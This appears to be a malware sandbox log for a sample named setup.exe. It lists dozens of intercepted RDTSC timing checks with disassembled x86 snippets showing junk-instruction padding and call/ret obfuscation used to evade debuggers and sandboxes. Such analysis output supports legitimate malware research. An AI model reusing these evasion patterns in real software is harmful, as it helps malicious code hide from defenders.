Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 572316 second address: 572335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 572335 second address: 572339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 573C40 second address: 573C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F808D4B80B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 573C4A second address: 573C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 576F52 second address: 576FB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 jmp 00007F808D4B80BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F808D4B80C2h 0x00000014 jmp 00007F808D4B80C5h 0x00000019 jmp 00007F808D4B80BEh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57B5F5 second address: 57B5FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57B5FC second address: 57B627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F808D4B80CBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e je 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57B627 second address: 57B635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57B44F second address: 57B454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57B454 second address: 57B492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280531h 0x00000009 jmp 00007F808D28052Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a ja 00007F808D280526h 0x00000020 popad 0x00000021 jmp 00007F808D28052Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57E18C second address: 57E1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F808D4B80C3h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57E1AB second address: 57E1CB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F808D280532h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F808D28052Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58027F second address: 580285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5802D8 second address: 5802DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5802DE second address: 5802E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5802E3 second address: 5802F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5802F4 second address: 580361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007F808D4B80BCh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F808D4B80BDh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F808D4B80C8h 0x0000002b popad 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F808D4B80B8h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 580361 second address: 580366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 580366 second address: 5803B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov di, ax 0x0000000d call 00007F808D4B80B9h 0x00000012 jng 00007F808D4B80BAh 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c push eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push esi 0x00000022 pop esi 0x00000023 popad 0x00000024 jmp 00007F808D4B80C9h 0x00000029 popad 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5803B1 second address: 5803BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5803BF second address: 5803E4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jbe 00007F808D4B80BEh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 580AEA second address: 580B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F808D28052Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5816A4 second address: 5816A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5816A9 second address: 5816BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58457F second address: 5845A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jp 00007F808D4B80B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58583B second address: 5858A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 je 00007F808D280526h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F808D28052Dh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F808D280528h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 add edi, 7B6F6A26h 0x00000038 push 00000000h 0x0000003a jne 00007F808D280529h 0x00000040 push 00000000h 0x00000042 jmp 00007F808D280531h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push esi 0x0000004d pop esi 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5858A2 second address: 5858A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5858A6 second address: 5858AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5879B6 second address: 587A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F808D4B80B8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov si, cx 0x0000002c push 00000000h 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F808D4B80BCh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push esi 0x00000039 pop esi 0x0000003a pop esi 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58D90E second address: 58D913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58D913 second address: 58D919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58E84A second address: 58E84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 590A68 second address: 590A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 590A6C second address: 590A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58CB8A second address: 58CC23 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D4B80BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F808D4B80BAh 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D17ACh] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F808D4B80B8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 movsx ebx, ax 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 pushad 0x00000043 jmp 00007F808D4B80C0h 0x00000048 add ecx, dword ptr [ebp+122D29FBh] 0x0000004e popad 0x0000004f mov eax, dword ptr [ebp+122D0269h] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F808D4B80B8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f push FFFFFFFFh 0x00000071 mov dword ptr [ebp+122D1C17h], ebx 0x00000077 nop 0x00000078 pushad 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58CC23 second address: 58CC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58EAEA second address: 58EB06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58CC29 second address: 58CC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59289D second address: 5928A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58CC31 second address: 58CC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5928A3 second address: 592911 instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D4B80B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2DA5h], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F808D4B80B8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F808D4B80B8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d xor dword ptr [ebp+122D1E64h], eax 0x00000053 xchg eax, esi 0x00000054 jng 00007F808D4B80C2h 0x0000005a jbe 00007F808D4B80BCh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 592911 second address: 592930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D280537h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5949A3 second address: 5949B0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5949B0 second address: 5949D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D280532h 0x00000010 jnl 00007F808D280526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5949D3 second address: 5949DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5949DD second address: 5949E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5949E3 second address: 5949FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A15D second address: 53A16B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A16B second address: 53A175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A175 second address: 53A196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A196 second address: 53A1E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F808D4B80B6h 0x00000010 jmp 00007F808D4B80C3h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jmp 00007F808D4B80C4h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A1E3 second address: 53A1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53A1F3 second address: 53A1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 595072 second address: 595078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59891B second address: 59891F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59891F second address: 59894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, 5DB3E461h 0x0000000d push 00000000h 0x0000000f mov bh, A7h 0x00000011 push 00000000h 0x00000013 jp 00007F808D28052Ah 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jne 00007F808D280526h 0x00000024 popad 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59B995 second address: 59B9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jg 00007F808D4B80B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59B9AA second address: 59B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59BF44 second address: 59BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007F808D4B80B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59BF5B second address: 59BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F808D28052Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59BF68 second address: 59BFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov ebx, dword ptr [ebp+122D2E25h] 0x0000000c mov bx, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F808D4B80B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d xor ebx, dword ptr [ebp+122D25C4h] 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jne 00007F808D4B80BCh 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599AFA second address: 599AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599AFF second address: 599B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59CEFE second address: 59CF03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599B0D second address: 599B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F808D4B80B8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 sub dword ptr [ebp+122D19B2h], esi 0x00000027 or bl, 00000036h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 sub dword ptr [ebp+124833B8h], esi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e and di, 7625h 0x00000043 mov eax, dword ptr [ebp+122D1039h] 0x00000049 sbb ebx, 521564A7h 0x0000004f push FFFFFFFFh 0x00000051 mov dword ptr [ebp+122D2B58h], edi 0x00000057 mov dword ptr [ebp+122D2C51h], ecx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007F808D4B80BCh 0x00000066 pushad 0x00000067 popad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDD2 second address: 59FDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDD6 second address: 59FDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDDF second address: 59FDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDE5 second address: 59FDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDF0 second address: 59FDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FDF6 second address: 59FE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F808D4B80B8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 and bx, B5C8h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F808D4B80B8h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jng 00007F808D4B80BBh 0x00000048 mov ebx, 0C878644h 0x0000004d mov ebx, dword ptr [ebp+122D2867h] 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FE60 second address: 59FE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FF8E second address: 59FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FF92 second address: 59FF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
